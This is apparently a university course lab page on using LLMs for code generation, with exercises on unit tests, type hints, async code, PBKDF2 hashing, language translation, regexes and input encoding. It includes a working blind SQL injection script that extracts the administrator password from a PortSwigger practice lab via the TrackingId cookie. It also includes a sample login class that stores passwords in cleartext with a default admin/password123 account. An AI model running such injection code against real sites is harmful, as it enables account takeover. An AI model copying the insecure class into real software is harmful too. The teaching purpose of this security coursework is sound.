08.1: Code Generation

In this week's exercises, your group will try out the various tasks for code generation using LLMs. Begin by completing the initial parts of the codelab. Then, attempt the exercise your group has been assigned in the following Google Slide presentation:

Week 8 slides

Add screenshots that you can use to walkthrough how you performed the exercise. Your group will present your results for the exercise during the last hour of class. After completing the exercise you've been assigned, continue to the rest of the exercises in order to prepare for the week's homework assignment.

Code generation is one of the more useful tasks a model can do. It's difficult to trust the code it produces without having an idea of what a correct version of the code looks like. In this exercise, a simple Python class that implements a username-password authentication function using a SQLite3 database is shown. Within the class:

A connection is created to a SQLite3 database stored in the file 'users.db' within the class constructor.
If the database does not exist or doesn't contain a users table, a call to the initilizeUsers() method of the class is performed which creates the users table with text fields: username and password. It then calls the addUser() method to add the admin username with the password of 'password123'
An addUser() method is implemented that takes a username and a password and inserts them into the database if the username does not exist in the database.
A checkUser() method is implemented that takes a username and password, retrieves the password for the username from the database, then checks it against the given password. The method returns True if they match, False otherwise.

import sqlite3

DB_FILE = 'users.db'    # file for our Database

class Users():
    def __init__(self):
        self.connection = sqlite3.connect(DB_FILE)
        cursor = self.connection.cursor()
        try:
            cursor.execute("select count(rowid) from users")
        except sqlite3.OperationalError:
            self.initializeUsers()

    def initializeUsers(self):
        cursor = self.connection.cursor()
        cursor.execute("create table users (username text, password text)")
        self.addUser('admin','password123')

    def addUser(self, username, password):
        cursor = self.connection.cursor()
        params = {'username':username}
        cursor.execute("SELECT username FROM users WHERE username=(:username)", params)
        res = cursor.fetchall()
        if len(res) == 0:
            params = {'username':username, 'password':password}
            cursor.execute("insert into users (username, password) VALUES (:username, :password)", params)
            self.connection.commit()
            return True
        else:
            return False

    def checkUser(self, username, password):
        params = {'username':username}
        cursor = self.connection.cursor()
        cursor.execute("select password from users WHERE username=(:username)", params)
        res = cursor.fetchall()
        if len(res) != 0:
            password_from_db = res.pop()[0]
            if password == password_from_db:
                return True
        return False

The goal of the exercise is to generate a prompt that allows an LLM to produce

Ask an LLM to generate a prompt that can produce the code above
Then, in a new chat, send the prompt to the LLM. Does it generate an equivalent piece of code?
Handcraft a prompt that allows an LLM to generate code that is as close to the original as possible

Unit tests that are built into a program allow one to catch code changes that may break the functionality of the application. For example, consider the code below that implements a square root.

import math

def square_root(n):
    if isinstance(n, int) and n >= 0:
        return math.sqrt(n)
    else:
        raise ValueError("Input must be a positive integer.")

To add unit tests to this code, one could utilize the unittest package in Python and add assertions that should hold on a variety of test cases. An example is shown below

class TestSquareRoot(unittest.TestCase):
    def test_zero(self):
        self.assertEqual(square_root(0), 0.0)

    def test_non_integer(self):
        with self.assertRaises(ValueError):
            square_root(4.5)
        with self.assertRaises(ValueError):
            square_root("string")
        with self.assertRaises(ValueError):
            square_root([4])

    def test_negative_integer(self):
        with self.assertRaises(ValueError):
            square_root(-1)

if __name__ == "__main__":
    unittest.main()

For our password authentication example, we wish to test the expected behavior of the code across a variety of tests to ensure correctness. For example, the code should:

Ensure the default admin user is created with the password 'password123'
Ensures an account that already exists can not be created again
Ensures that one can properly add a new username and password and that they are properly returned from the database when subsequently queried.
Ensures that a username and password pair that is given, is properly checked when given combinations of correct and incorrect values.

While one could generate these tests manually, an LLM may be able to generate them instead.

Ask an LLM to instrument the password program to produce unit tests that can be run to validate code correctness
Do the unit tests generated provide sufficient coverage for the program?
Run the generated program and analyze the results for correctness.

Python versions beyond 3.5 support type annotations in order to give the developer the ability to reason about data types within their programs. Adding type annotations to code written prior to this version is something that can be potentially automated by an LLM. Consider the code below that fetches a URL using the requests package, parses the page using BeautifulSoup, and then returns the page's <title> tag if it exists.

import requests
from bs4 import BeautifulSoup

def getUrlTitle(url):
    resp = requests.get(url)
    title_tag = BeautifulSoup(resp.text, 'html.parser').find('title')
    if title_tag and title_tag.text:
        return title_tag.text.strip()
    else:
        return None

A fully annotated version is shown below with each parameter and return value assigned a type, along with any variable that has been utilized. In addition, the Optional type is used when the return type can be either the given type (e.g. str) or None.

import requests
from bs4 import BeautifulSoup
from typing import Optional 

def getUrlTitle(url: str) -> Optional[str]:  
    resp: requests.Response = requests.get(url)    
    resp.raise_for_status()
    soup: BeautifulSoup = BeautifulSoup(resp.text, 'html.parser')  

    title_tag: Optional[BeautifulSoup.Tag] = soup.find('title')  
    if title_tag and title_tag.text:
        return title_tag.text.strip()
    else:
        return None

With the code given previously for the password authentication program

Ask an LLM to generate a fully type-annotated version of the program

One of the potential uses for a code-based LLM is to take existing code and implement new functionality. Consider the code below that sequentially downloads URLs and pulls out their <title> tags.

def getUrlTitle(url):
    resp = requests.get(url)
    title_tag = BeautifulSoup(resp.text, 'html.parser').find('title')
    ...

def getSequential(urls):
    titles = []
    for u in urls:
        titles.append(getUrlTitle(u))
    return(titles)

urls = 
print(getSequential(['https://pdx.edu', 'https://oregonctf.org']))

One can convert the code to use asynchronous calls as shown below using an LLM

async def getUrlTitle(session, url):
    async with session.get(url) as resp:
        html = await resp.text()
        title_tag = BeautifulSoup(html, 'html.parser').find('title')
        ...

async def getAsync(urls):
    async with aiohttp.ClientSession() as session:
        tasks = [getUrlTitle(session, url) for url in urls]
        titles = await asyncio.gather(*tasks)
        return titles

print(asyncio.run(getAsync(['https://pdx.edu', 'https://oregonctf.org'])))

The prior password program utilizes cleartext passwords in its implementation instead of a password hash of it. Unfortunately, if the system were compromised, cleartext passwords for every user would be exposed, allowing an adversary to perform credential stuffing. Given the original password code:

Ask an LLM to convert the password program to into one that uses PBKDF2 with SHA-256 using 100,000 iterations to store hashes into the database rather than cleartext passwords
After generating the version, have the LLM produce unit tests that validate the implementation. What does it test?
Test the resulting implementation by running it

LLMs have been successfully used to translate text from one language to another. Since programming languages are just another type of language, one potential use for LLMs is to automatically translate a program to another programming language.

Javascript

In this exercise, we'll translate our original password code written in Python into Javascript. We'll begin by asking an LLM to create a Javascript equivalent for the password program. As part of the prompt, give the LLM some additional instructions to guide its translation such as:

Utilize the sqlite3 module
Add test cases to validate correctness and ensure they run serially
Log all calls to the console and include the calling parameters

Using the above as a guide,

Ask an LLM to convert the password program from Python to Javascript
Does the code generated implement the application faithfully?

To run the code, bring up the course VM and install the latest Node.js version.

sudo apt update -y
sudo apt install nodejs npm -y
sudo npm install -g n
sudo n stable
hash -r

Create a directory to run the application from, and install the Javascript packages that are required.

mkdir js
cd js
npm install sqlite3

Copy the code the LLM produced into the file users.js. Then, run the code.

node users.js

Do the tests generated pass?

Typescript

We'll attempt to repeat the exercise using Typescript instead.

Ask an LLM to convert the password program from Python to Typescript
Does the code generated implement the application faithfully?

Install the Typescript package

npm install ts-node

Copy the code the LLM produced into the file users.ts. Then, run the npx command to transpile the code to Javascript and execute it.

npx ts-node users.js

Does the code run successfully?
Do the tests generated pass?

LLMs can be used to rapidly speed up the process of exploit development. Open the Portswigger level https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses. After reading the lab description and the hint click the access the lab button. The level has a SQL injection vulnerability in its tracking cookie (TrackingID) that allows one to exfiltrate the password for the administrator account programmatically. The code below performs a brute-force linear search on each character of the password in order to solve the level.

import requests
from bs4 import BeautifulSoup
import time
import urllib.parse

def test_string(url, prefix, letter):
    query = f"x' union select 'a' from users where username = 'administrator' and password ~ '^{prefix}{letter}'--"
    print(f'Testing ^{prefix}{letter}')
    mycookies = {'TrackingId': urllib.parse.quote_plus(query)}

    resp = requests.get(url, cookies=mycookies)
    soup = BeautifulSoup(resp.text, 'html.parser')

    if soup.find('div', text='Welcome back!'):
        print(f'Found character {letter}')
        return True
    else:
        return False

site = ''
url = f'https://{site}/'
start_alpha = 'abcdefghijklmnopqrstuvwxyz0123456789'
prefix = ''

begin_time = time.perf_counter()
while True:
  if test_string(url, prefix, '$'):
    break
  for letter in start_alpha:
    check = test_string(url, prefix, letter)
    if check:
      prefix += letter
      break

print(f'Password is {prefix}')
print(f"Time elapsed is {time.perf_counter()-begin_time}")

Develop a prompt that allows an LLM to create the above program
Test the generated program to ensure that it finds the administrator password (but do not solve the level)

As part of the homework assignment, students create a version of the prior program that performs a binary search instead of a linear search, thus reducing the run-time for finding each character of the password from O(n) where n is the number of characters in the character set to O(n log n). For example, the following injection utilizes the ~ operator in SQL to perform a regular expression search on the first letter of the administrator's password.

charset = string.ascii_lowercase + string.digits

query = """x' UNION SELECT username from users where username = 'administrator' and password ~ '^[{charset[:mid]}]' --"""

Using the linear search program and instructing the LLM to generate a program that implements a binary search algorithm per character using the ~ operator,

Develop a prompt that produces a binary search implementation of it
Test the resulting implementation by running it and ensure that the administrator password matches what was found via the linear search
Solve the level

Another task an LLM may help with is to generate regular expressions based on strings that a user supplies. Consider the strings below that are used to polymorph the User-Agent: HTTP header in an attempt to evade detection. Filtering software could be configured with a singular regular expression that covers all of these strings.

We4b58
We7d7f
Wea4ee
We70d3
Wea508
We6853
We3d97
We8d3a
Web1a7
Wed0d1
We93d0
Wec697
We5186
We90d8
We9753
We3e18
We4e8f
We8f1a
Wead29
Wea76b
Wee716

Query the LLM to see if it is able to generate a Python regular expression that matches all of the strings above. Then visit https://regex101.com/ to validate the expression against the data provided.

Does it generate a correct regular expression?
If not, reduce the number of strings until it provides one

There are limits to how accurately a model can perform this task. Repeat the task, but insert strings that can cause the LLM to produce an incorrect result.

What input data can cause an LLM to produce an erroneous expression?

When an application takes input controlled by an end user and uses it within the application, it must either be properly encoded (where sensitive characters are converted into innocuous ones) or filtered (where sensitive characters are simply removed). Without doing so, attacks such as command injection, SQL injection, and cross-site scripting (XSS) can occur. In this exercise, we will examine an LLMs ability to produce code that performs appropriate encoding and filtering.

An algorithm that is encoding and escaping input needs to be written according to the context in which the input is used in the application, leading the developer to encode different characters based on where the input is consumed. In this exercise, consider a string named user_input whose value is given by the user. Prompt an LLM to generate Python code that encodes user_input so it can be:

Safely used as an argument in a Linux command
Safely included in an HTML document
Safely included in an HTML attribute (e.g. f'')
Safely included as a URL parameter (e.g. f'https://foo.com/?name={user_input}')
Safely included as data in a Javascript program
Safely included as a field in a CSV (comma separated value) file
Explain what the code for each example does that prevents attacks

In the previous exercise, an LLM was used to perform encoding and escaping on a user's input to ensure it could be safely used in a particular application context. Another approach to sanitize input is to simply filter sensitive characters completely. Prompt an LLM to generate Python code that filters a string stored in user_input so that it can be:

Safely used as an argument in a Linux command
Safely included in an HTML document
Safely included in an HTML attribute (e.g. f'')
Safely included as a URL parameter (e.g. f'https://foo.com/?name={user_input}')
Safely included as data in a Javascript program
Safely included as a field in a CSV (comma separated value) file
Explain what the code for each example does that prevents attacks